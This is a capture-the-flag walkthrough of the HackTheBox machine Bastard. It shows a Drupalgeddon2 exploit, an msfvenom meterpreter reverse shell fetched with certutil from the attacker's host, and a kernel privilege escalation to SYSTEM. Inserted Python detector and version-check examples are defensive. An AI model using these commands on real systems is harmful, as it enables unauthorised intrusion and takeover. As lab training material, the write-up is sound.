Bastard HackTheBox WalkThrough

This is the Bastard HackTheBox machine walkthrough, and it is also the 6th machine of our OSCP-like HTB boxes series. In this writeup, I have demonstrated step by step how I rooted the Bastard HTB machine.

Before starting, let us know something about this machine. It is a Windows machine with IP address 10.10.10.9 and a difficulty of medium assigned by its maker. This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. Before starting, connect your PC to the VPN and confirm connectivity with the Bastard machine by pinging the IP 10.10.10.9. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap [a popular port scanner] for this task, and the result is below:

Scanning

$ nmap -sC -sV -oN bastard.nmap 10.10.10.9

[Screenshot: Nmap scan report of the Bastard machine]

Nmap revealed that ports 80, 135 and 49154 are open: a Microsoft IIS 7 web server on port 80, and Microsoft RPC services on ports 135 and 49154. The Nmap script http-generator revealed that the website is built with the Drupal CMS [Drupal is a Content Management System, like WordPress] and that its version is 7. As soon as I identify any software and its version, I immediately search for a public exploit using searchsploit. Searchsploit listed a large number of potential exploits. The problem, however, is that with so many exploits we do not know which one will surely work. To filter out the most appropriate one, I had to know the exact version of Drupal running on port 80. After some googling, I found this answer on Stack Overflow:

[Screenshot: Stack Overflow answer on how to find the installed version of Drupal]

Going to the http://10.10.10.9/CHANGELOG.txt URL, I found that the installed version is 7.54.

[Screenshot: CHANGELOG.txt of the Bastard machine showing Drupal 7.54]
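The version hunt above turns on one detail: Drupal 7 ships CHANGELOG.txt in the webroot, and its first line names the installed release. As an added example that is not part of the original walkthrough, here is a small Python check a site owner can run against a saved copy of that file to see what it leaks and whether the exposed version predates the Drupal 7.58 release that fixed Drupalgeddon2 (the flaw 44449.rb exploits; the 7.58 figure is a fact stated here, not something quoted on the page). The sample changelog text is constructed; the function and constant names are my own.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed sample of the top of a Drupal 7 CHANGELOG.txt (the newest
# release is always listed first). The text is made up for this example.
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines.
- Logging of searches can now be disabled.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/IE 11+ versions.
"""

# Drupal 7.58 carried the fix for Drupalgeddon2, which 44449.rb exploits.
# This constant is a fact stated here; the walkthrough itself does not quote it.
DRUPALGEDDON2_FIXED_IN_7 = (7, 58)

# First line of a Drupal 7 changelog looks like "Drupal 7.54, 2017-02-01".
VERSION_RE = re.compile(r"^Drupal\s+(\d+)\.(\d+)(?:\.(\d+))?\s*,", re.MULTILINE)


def drupal_version_from_changelog(text: str) -> Optional[Tuple[int, ...]]:
    """Return the newest release listed in CHANGELOG.txt as an int tuple, or None."""
    match = VERSION_RE.search(text)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups() if part is not None)


def is_vulnerable_to_drupalgeddon2(version: Tuple[int, ...]) -> bool:
    """True when a Drupal 7 version predates the 7.58 fix (8.x used other numbers)."""
    if version[0] != 7:
        raise ValueError("only Drupal 7.x versions are handled here")
    return version[:2] < DRUPALGEDDON2_FIXED_IN_7


def assess_changelog(text: str) -> Dict[str, object]:
    """Summarise what an exposed CHANGELOG.txt tells a visitor about this site."""
    version = drupal_version_from_changelog(text)
    if version is None:
        return {"version": None, "exposed": False, "vulnerable": None,
                "advice": "No Drupal version header found; nothing leaked."}
    if version[0] != 7:
        return {"version": version, "exposed": True, "vulnerable": None,
                "advice": "Not a 7.x release; check it against the matching core advisories."}
    vulnerable = is_vulnerable_to_drupalgeddon2(version)
    advice = ("Update Drupal core immediately." if vulnerable
              else "Core is past the Drupalgeddon2 fix; still remove CHANGELOG.txt from the webroot.")
    return {"version": version, "exposed": True, "vulnerable": vulnerable, "advice": advice}


if __name__ == "__main__":
    print(assess_changelog(SAMPLE_CHANGELOG))
```

Run against the real file fetched from your own site, the result for a 7.54 install is the same one the walkthrough reaches by eye: the version is exposed and it is older than the fix. Either outcome is a reason to remove the changelog from the document root, since the version string alone is what narrows the searchsploit list from many candidates to one.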

Then I queried searchsploit again, and this time it found 8 potential exploits.

$ searchsploit drupal 7.54

[Screenshot: searching for the exploit through searchsploit]

After trying each of them, I found that only 44449.rb worked for me. For more info about this exploit, you can check here. Then I mirrored the exploit to my current directory using the -m switch of searchsploit.

$ searchsploit -m php/webapps/44449.rb

[Screenshot: copying the Ruby exploit to the current directory]

Currently the file 44449.rb is in DOS format, so I converted it into UNIX format using the command dos2unix.

$ dos2unix 44449.rb

[Screenshot: converting the DOS file format to UNIX format with dos2unix]

I ran this exploit to get a user shell.

Getting User Shell

$ ruby 44449.rb http://10.10.10.9
drupalgeddon2 >> whoami

Note: If you get an error as shown in the screenshot, it is due to a missing gem named highline in your gem directory. To solve this problem, install the gem using the command $ sudo gem install highline

[Screenshot: getting a user shell through the exploit]

We got a user shell as the user named iusr. Right now we are in a fake cmd shell with limited functionality, and we cannot capture the user flag because this shell restricts execution of the type command. So I upgraded to a meterpreter shell by dropping a payload created with msfvenom onto the Bastard machine and catching the meterpreter session on my listener in msfconsole.

Upgrading Shell

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe > shell.exe   # create the exe payload on our local PC
$ python3 -m http.server 80   # start a Python HTTP server to host shell.exe
drupalgeddon2 >> certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe   # download the payload to the bastard machine

[Screenshot: creating the meterpreter payload and downloading it to the bastard machine]
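Everything in the step above runs in a process tree that starts at the web server: the exploit shell is the PHP worker running as iusr, it spawns cmd.exe, cmd.exe runs certutil as a downloader, and then the dropped shell.exe is launched from the web directory. That lineage is what a defender should alert on. As an added example that is not part of the original walkthrough, here is a small Python detector over constructed process-creation events (fields modelled on Sysmon event 1 / Windows 4688: pid, ppid, image, command line); the IIS/PHP process names, the pids and the webroot path are assumptions for the example, not facts observed on the box.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    """One process-creation record (fields modelled on Sysmon event 1 / 4688)."""
    pid: int
    ppid: int
    image: str
    command_line: str


# Constructed events for an IIS host running PHP through FastCGI. Process names,
# pids and the webroot path are assumptions for this example, not from the box.
SAMPLE_EVENTS = [
    ProcEvent(1000, 500, r"C:\Windows\System32\inetsrv\w3wp.exe", "w3wp.exe -ap DefaultAppPool"),
    ProcEvent(1100, 1000, r"C:\PHP\php-cgi.exe", "php-cgi.exe"),
    ProcEvent(1200, 1100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\certutil.exe",
              'certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe'),
    ProcEvent(1400, 2000, r"C:\Windows\System32\certutil.exe", "certutil.exe -verify cert.cer"),
    ProcEvent(1500, 1200, r"C:\inetpub\wwwroot\shell.exe", "shell.exe"),
]

WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}   # processes that serve web requests (assumed)
SHELLS = {"cmd.exe", "powershell.exe"}
WEBROOT_PREFIXES = ("c:\\inetpub\\",)       # assumed document-root location


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(event: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Image basenames of the parent chain, nearest parent first (cycle-safe)."""
    chain, seen = [], set()
    cur = by_pid.get(event.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def is_certutil_download(command_line: str) -> bool:
    """certutil used as a downloader: -urlcache plus a URL. Benign uses (-verify etc.) pass."""
    low = command_line.lower()
    return "certutil" in low and "-urlcache" in low and ("http://" in low or "https://" in low)


def detect(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Apply three rules; each alert records whether the process descends from a web worker."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        lineage = ancestors(e, by_pid)
        from_web = any(a in WEB_WORKERS for a in lineage)
        if name in SHELLS and lineage and lineage[0] in WEB_WORKERS:
            alerts.append({"pid": e.pid, "rule": "web_worker_spawned_shell", "from_web": from_web})
        if is_certutil_download(e.command_line):
            alerts.append({"pid": e.pid, "rule": "certutil_download", "from_web": from_web})
        if e.image.lower().startswith(WEBROOT_PREFIXES) and name.endswith(".exe"):
            alerts.append({"pid": e.pid, "rule": "executable_launched_from_webroot", "from_web": from_web})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On the sample data the detector raises three alerts (the cmd.exe under php-cgi.exe, the certutil download, and shell.exe launched from the webroot) and stays quiet on the administrator's certutil -verify. The from_web flag is the useful part for triage: a certutil download by itself is noisy on some estates, but one whose ancestry runs back to w3wp.exe has no legitimate explanation. Blocking outbound connections from the IIS host, as the walkthrough's reverse shell on port 4321 shows, would have stopped the chain at the same point.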

I started the listener in msfconsole to catch the reverse shell:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo

[Screenshot: upgrading the shell to a meterpreter shell]

We have successfully upgraded to a meterpreter shell. Now we have many options available to play with in meterpreter.

Capture User Flag

meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'

[Screenshot: user flag captured]

Privilege Escalation

To escalate privileges to admin, we first have to find a privilege escalation vector and then exploit it to get an admin-privileged shell. To find a PrivEsc vector I ran the post-exploitation module post/multi/recon/local_exploit_suggester, which gathers all the exploit modules that could be used to escalate privileges. Basically, it enumerates all the potential kernel exploits whose patch is not installed on the Bastard machine.

Finding PrivEsc Vector

meterpreter > run post/multi/recon/local_exploit_suggester

[Screenshot: running local_exploit_suggester to enumerate available kernel exploits]

Local Exploit Suggester gave 5 exploits that could be used to get an admin shell. I tried each of them one by one, and only the exploit/windows/local/ms16_014_wmi_recv_notif module worked. So here our PrivEsc vector is a kernel exploit.

Getting Root Shell

meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
meterpreter > getuid

[Screenshot: privilege escalation on Bastard]

We are NT AUTHORITY\SYSTEM. Let us capture the root flag.

Capture Root Flag

meterpreter > cat /Users/Administrator/Desktop/root.txt.txt

[Screenshot: root flag captured]

This was how I rooted the Bastard HackTheBox machine. I learnt a lot hunting this box, and I hope you have also learnt something new from it. Thanks for reading this writeup. Write about your experience in the comment section. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].

The next machine walkthrough is Arctic.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/